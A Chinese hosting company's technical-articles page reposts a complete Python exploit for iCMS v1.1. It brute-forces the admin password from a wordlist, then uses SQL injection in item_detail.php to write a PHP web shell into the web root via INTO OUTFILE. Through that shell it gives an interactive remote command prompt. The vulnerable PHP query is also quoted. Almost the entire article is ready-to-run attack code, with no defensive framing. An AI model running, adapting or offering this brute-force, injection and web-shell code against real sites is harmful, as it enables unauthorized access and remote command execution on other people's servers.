您好,欢迎来到思海网络,我们将竭诚为您提供优质的服务! 诚征网络推广 | 网站备案 | 帮助中心 | 软件下载 | 购买流程 | 付款方式 | 联系我们 [ 会员登录/注册 ]
促销推广
客服中心
业务咨询
有事点击这里…  531199185
有事点击这里…  61352289
点击这里给我发消息  81721488
有事点击这里…  376585780
有事点击这里…  872642803
有事点击这里…  459248018
有事点击这里…  61352288
有事点击这里…  380791050
技术支持
有事点击这里…  714236853
有事点击这里…  719304487
有事点击这里…  1208894568
有事点击这里…  61352289
在线客服
有事点击这里…  531199185
有事点击这里…  61352288
有事点击这里…  983054746
有事点击这里…  893984210
当前位置:首页 >> 技术文章 >> 文章浏览
技术文章

iCMS v1.1 Admin SQLi/Bruteforce Exploit

添加时间:2011-3-20  添加: admin 

#!/usr/bin/python
# ~INFORMATION
# Exploit Title:        iCMS v1.1 Admin SQLi/bruteforce Exploit
# Author:               TecR0c
# Date:                 18/3/2011
# Software link:        http://bit.ly/hbYy35
# Tested on:            Linux bt
# Version:              v1.1
# [XXX]: The likelihood of this exploit being successful is low
# as it requires knowledge of the web path and file privileges
# however a PoC is still written ;)

# ~VULNERABLE CODE:
'''
15 $id = $_GET['id'];
16 $title = NULL;
17 $text = NULL;
18 database_connect();
19 $query = "select title,text from icmscontent where id = $id;";
20 //echo $query;
21 $result = mysql_query($query);
'''
#~EXPLOIT
import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass
from optparse import OptionParser
from urlparse import urlparse,urljoin
from urllib import urlopen
from cookielib import CookieJar

__AUTHOR__ ="TecR0c"
__DATE__ ="18.3.2011"

usage = 'Example : %s http://localhost/iCMS/ -w passwords.txt -p 127.0.0.1:8080' % __file__
parser = OptionParser(usage=usage)
parser.add_option("-p","--proxy", type="string",action="store", dest="proxy",
    help="HTTP Proxy <server>:<port>")
parser.add_option("-u","--username", type="string",action="store", default="admin", dest="username",
    help="Username for login")
parser.add_option("-w","--wordlist", type="string",action="store", dest="wordlist",
    help="file to use to bruteforce password")

(options, args) = parser.parse_args()

#VARS
sitePath = '/var/www/iCMS/icms/'
webshell = '<?php+system(base64_decode($_REQUEST[cmd]));?>'

if options.proxy:
    print '[+] Using Proxy'+options.proxy
# User Agents
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
    "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",
    "Google Chrome 0.2.149.29 (Windows XP)",
    "Opera 9.25 (Windows Vista)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
    "Opera/8.00 (Windows NT 5.1; U; en)"]
agent = random.choice(agents)

def banner():
    if os.name == "posix":
        os.system("clear")
    else:
        os.system("cls")
    header = '''
|----------------------------------------|
|Exploit: iCMS SQLi RCE
|Author: %s
|Date: %s
|----------------------------------------|\n
'''%(__AUTHOR__,__DATE__)
    for i in header:
        print "\b%s"%i,
        sys.stdout.flush()
        time.sleep(0.005)

def proxyCheck():
    if options.proxy:
        try:
            h2 = httplib.HTTPConnection(options.proxy)
            h2.connect()
            print "[+] Using Proxy Server:",options.proxy
        except(socket.timeout):
            print "[-] Proxy Timed Out\n"
            sys.exit(1)
        except(NameError):
            print "[-] Proxy Not Given\n"
            sys.exit(1)
        except:
            print "[-] Proxy Failed\n"
            sys.exit(1)

def getProxy():
    try:
        proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
    except(socket.timeout):
        print "\n[-] Proxy Timed Out"
        sys.exit(1)
    return proxy_handler

cj = CookieJar()
if options.proxy:
    opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
else:
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders = [('User-agent', agent)]

def loginAttempt():
    try:
        passwordlist = open(options.wordlist,'r').readlines()
        print "[+] Length Of Wordlist: "+str(len(passwordlist))
    except(IOError):
        print "[-] Error: Check Your Wordlist Path\n"
        sys.exit(1)
    for password in passwordlist:
        password = password.replace("\r","").replace("\n","")
        sys.stdout.write('\r[+] Brute-forcing password with: %s          \r' % password)
        sys.stdout.flush()
        time.sleep(0.2)
        authenticated = login(password)
        if authenticated:
            break

def login(password):
    webSiteUrl = url.geturl()+'login.php'
    postParameters = {'formlogin' : options.username,'formpass' : password}
    postParameters = urllib.urlencode(postParameters)
    try:
        response = opener.open(webSiteUrl, postParameters).read()
    except:
        print '\n[-] Could not connect'
        sys.exit()
    loggedIn = re.compile(r"continue to the admin")
    authenticated = loggedIn.search(response)
    if authenticated:
        print '\n[+] logged in as %s' % options.username
    else:
        pass
    return authenticated

def performSQLi():
    webSiteUrl = url.geturl()+"/admin/item_detail.php?id=1+union+select+'ph33r',user()"
    try:
        response = opener.open(webSiteUrl).read()
    except:
        print '\n[-] Failed'
    root = re.compile("root")
    rootuser = root.search(response)
    if rootuser:
        print '[+] I smell ROOT :p~'
        webSiteUrl = url.geturl()+\
        "admin/item_detail.php?id=1+UNION+SELECT+NULL,'TECR0CSHELL"\
        +webshell+"LLEHSC0RCET'+INTO+OUTFILE+'"+sitePath+".webshell.php'"
        opener.open(webSiteUrl)
        print '[+] Wrote WEBSHELL !'
    else:
        print '\n[-] Could not gain access'
        sys.exit()

def postRequestWebShell(encodedCommand):
    webSiteUrl = url.geturl()+'.webshell.php'
    commandToExecute = [
    ('cmd',encodedCommand)]
    cmdData = urllib.urlencode(commandToExecute)
    try:
        response = opener.open(webSiteUrl, cmdData).read()
    except:
        print '[-] Failed'
        sys.exit()
    return response

def clean(response):
    patFinder = re.compile('TECR0CSHELL(.*)LLEHSC0RCET',re.DOTALL)
    shell = patFinder.search(response)
    response = shell.group(1)
    return response

def commandLine():
    commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc)
    while True:
        try:
            command = raw_input(commandLine)
            encodedCommand = base64.b64encode(command)
            response = postRequestWebShell(encodedCommand)
            response = clean(response)
            print response
        except KeyboardInterrupt:
            encodedCommand = base64.b64encode('rm .webshell.php')
            postRequestWebShell(encodedCommand)
            print "\n[!] Removed .webshell.php\n"
            sys.exit()

if "__main__" == __name__:
    banner()
    try:
        url=urlparse(args[0])
    except:
        parser.print_help()
        sys.exit()
    getProxy()
    loginAttempt()
    performSQLi()
    commandLine()

关健词:iCMS v1.1 Admin SQLi

分享到:

顶部 】 【 关闭
版权所有:佛山思海电脑网络有限公司 ©1998-2024 All Rights Reserved.
联系电话:(0757)22630313、22633833
中华人民共和国增值电信业务经营许可证: 粤B1.B2-20030321 备案号:粤B2-20030321-1
网站公安备案编号:44060602000007 交互式栏目专项备案编号:200303DD003  
察察 工商 网安 举报有奖  警警  手机打开网站